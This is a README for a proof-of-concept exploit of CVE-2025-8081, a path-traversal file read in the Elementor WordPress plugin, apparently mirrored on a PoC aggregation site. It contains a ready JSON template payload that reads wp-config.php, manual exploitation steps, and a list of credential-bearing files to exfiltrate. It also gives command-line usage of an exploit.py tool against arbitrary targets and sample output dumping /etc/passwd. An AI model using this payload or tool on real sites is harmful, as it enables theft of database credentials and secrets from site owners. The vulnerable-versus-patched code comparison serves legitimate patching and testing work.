来源

关联漏洞

描述

PoC for CVE-2025-8081 - Elementor Arbitrary File Read Vulnerability

介绍

# CVE-2025-8081 - Elementor Arbitrary File Read Vulnerability

![Severity](https://img.shields.io/badge/Severity-CRITICAL-red)
![CVSS](https://img.shields.io/badge/CVSS-4.9-orange)
![WordPress](https://img.shields.io/badge/WordPress-Tested-blue)
![Elementor](https://img.shields.io/badge/Elementor-%E2%89%A43.30.2-red)

A critical arbitrary file read vulnerability in Elementor WordPress plugin that allows authenticated administrators to read any file accessible by the web server, including sensitive configuration files containing database credentials.

---

## 📋 Vulnerability Overview

### CVE Information

| Property | Value |
|----------|-------|
| **CVE ID** | CVE-2025-8081 |
| **Type** | Arbitrary File Read (CWE-22: Path Traversal) |
| **CVSS Score** | 4.9 (Medium) - **Real Impact: CRITICAL** |
| **CVSS Vector** | AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N |
| **Affected Versions** | Elementor ≤ 3.30.2 |
| **Fixed Version** | Elementor ≥ 3.30.3 |
| **Release Date** | July 22, 2025 |
| **Disclosure Date** | October 15, 2025 |

### Attack Requirements

- ✅ WordPress Administrator account
- ✅ Elementor plugin installed and activated
- ✅ Access to template import functionality
- ✅ Image Elementor Widget enabled

### Impact

- 🔴 **Arbitrary File Read**: Read any file accessible by the web server user (www-data)
- 🔴 **Credential Theft**: Access to `wp-config.php` reveals database credentials and security keys
- 🔴 **Database Compromise**: Full access to WordPress database using stolen credentials

---

## 🎯 Vulnerability Details

### Location

The vulnerability exists in a **single file** at a **single line**:

```
elementor/includes/template-library/classes/class-import-images.php
Line 115 (v3.28.3)
```

### Vulnerable Code (v3.28.3)

```php
if ( isset( $attachment['tmp_name'] ) ) {
    // Used when called to import a directly-uploaded file.
    $filename = $attachment['name'];
    $file_content = Utils::file_get_contents( $attachment['tmp_name'] );  // ❌ NO VALIDATION!
}
```

**Problem**: The `tmp_name` parameter is **NOT validated** with `is_uploaded_file()`, allowing an attacker to specify **arbitrary file paths**.

### Patched Code (v3.30.3)

```php
if ( isset( $attachment['tmp_name'] ) ) {
    // Used when called to import a directly-uploaded file.
    $filename = $attachment['name'];
    $file_content = false;
    // security validation in case the tmp_name has been tampered with
    if ( is_uploaded_file( $attachment['tmp_name'] ) ) {  // ✅ VALIDATION ADDED!
        $file_content = Utils::file_get_contents( $attachment['tmp_name'] );
    }
}
```

**Fix**: The patch adds `is_uploaded_file()` validation to ensure `tmp_name` refers to a legitimate HTTP POST uploaded file.

---

## 💣 Proof of Concept

### JSON Payload

```json
{
  "content": [{
    "id": "s1",
    "elType": "section",
    "settings": [],
    "elements": [{
      "id": "c1",
      "elType": "column",
      "settings": {"_column_size": 100},
      "elements": [{
        "id": "w1",
        "elType": "widget",
        "widgetType": "image",
        "settings": {
          "image": {
            "url": "http://x.com/x.jpg",
            "id": 1,
            "tmp_name": "/var/www/html/wp-config.php",
            "name": "leaked_config.txt"
          }
        },
        "elements": []
      }]
    }]
  }],
  "version": "0.4",
  "type": "page"
}
```

### Manual Exploitation Steps

1. Login to WordPress as Administrator
2. Navigate to **Elementor** → **My Templates** → **Import Templates**
3. Upload the JSON payload above (save as `payload.json`)
4. Click **Import Now**
5. Go to **Media** → **Library**
6. Find and download `leaked_config.txt`

**Result**: `wp-config.php` content with database credentials exposed!

---

## 📊 Interesting Files to Exfiltrate

### Critical Files

| File | Description | Impact |
|------|-------------|--------|
| `/var/www/html/wp-config.php` | WordPress configuration | 🔴 **CRITICAL** - DB credentials |
| `/proc/self/environ` | Environment variables | 🔴 **CRITICAL** - API keys, secrets |
| 

### High Value Files

| File | Description | Impact |
|------|-------------|--------|
| `/etc/passwd` | System users | 🟠 **HIGH** - User enumeration |
| `/var/www/html/.htaccess` | Web server config | 🟠 **HIGH** - Configuration disclosure |
| `/var/log/apache2/access.log` | Apache logs | 🟡 **MEDIUM** - Information disclosure |

---

## 🛠️ Automated Exploitation


### Quick Start

```bash
python3 exploit.py -t https://target.com -u admin -p password123
```

### Command-Line Options

```
Required Arguments:
  -t, --target URL        Target WordPress URL (e.g., https://target.com)
  -u, --user USERNAME     WordPress admin username
  -p, --password PASS     WordPress admin password

Optional Arguments:
  -f, --file PATH         File to read (default: /var/www/html/wp-config.php)
  -o, --output FILE       Output filename (default: auto-generated)
  --insecure, -k          Disable SSL certificate verification
  -v, --verbose           Enable verbose output for debugging
  -h, --help              Show help message
```

### Usage Examples

```bash
# Basic exploitation (reads wp-config.php with default payload)
python3 exploit.py -t http://target.com -u admin -p password123

# Custom target file
python3 exploit.py -t http://target.com -u admin -p password123 -f /etc/passwd

# With HTTPS and self-signed certificate
python3 exploit.py -t https://target.com -u admin -p password123 --insecure

# Verbose mode with custom output
python3 exploit.py -t http://target.com -u admin -p password123 \
  -f /etc/passwd -o users.txt -v

# From OrbStack/Docker targeting host machine
python3 exploit.py -t http://host.internal:8080 -u admin -p password123 -v
```

### Expected Output

```
Kali:~$ python3 exploit.py  -t http://host.internal:8080 -u admin -p admin123 -f /etc/passwd

======================================================================
 CVE-2025-8081 - Elementor Arbitrary File Read
======================================================================
Target: http://host.internal:8080
File:   /etc/passwd
======================================================================

[INFO] Attempting WordPress authentication...
[SUCCESS] ✓ Authentication successful!
[INFO] Fetching AJAX nonce...
[INFO] Loading payload: payload.json
[INFO] Uploading malicious template...
[SUCCESS] ✓ Template uploaded successfully!
[INFO] Searching for leaked file: leaked_passwd.txt
[SUCCESS] ✓ Found file: http://host.internal:8080/wp-content/uploads/2025/10/leaked_passwd.txt
[INFO] Downloading file...
[SUCCESS] ✓ Downloaded 839 bytes

======================================================================
 EXPLOITATION SUCCESSFUL!
======================================================================
File URL:  http://host.internal:8080/wp-content/uploads/2025/10/leaked_passwd.txt
File size: 839 bytes
Saved to:  leaked_passwd.txt

--- FILE CONTENT (first 500 chars) ---
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin
--- END ---
======================================================================
```

---

## ⚖️ Legal Disclaimer

**FOR EDUCATIONAL AND AUTHORIZED TESTING ONLY**

This tool is provided for security research and penetration testing purposes only. Usage of this tool for attacking targets without prior mutual consent is **illegal**.

**It is the end user's responsibility to obey all applicable local, state, and federal laws.**

- ✅ Use only on systems you own or have explicit written permission to test
- ✅ Responsible disclosure practices
- ✅ Educational and research purposes
- ❌ Unauthorized access is illegal and punishable by law
- ❌ The author assumes no liability for misuse

**By using this tool, you agree to use it legally and ethically.**

---

Last Updated: October 17, 2025

文件快照

 [4.0K]  /data/pocs/9bce1bcc187466f6f113bbdc54264d34d28c024e
├── [ 17K]  exploit.py
├── [1.7K]  LICENSE
├── [ 580]  payload_env.json
├── [ 574]  payload_etc_passwd.json
├── [ 591]  payload.json
└── [8.1K]  README.md

0 directories, 6 files

备注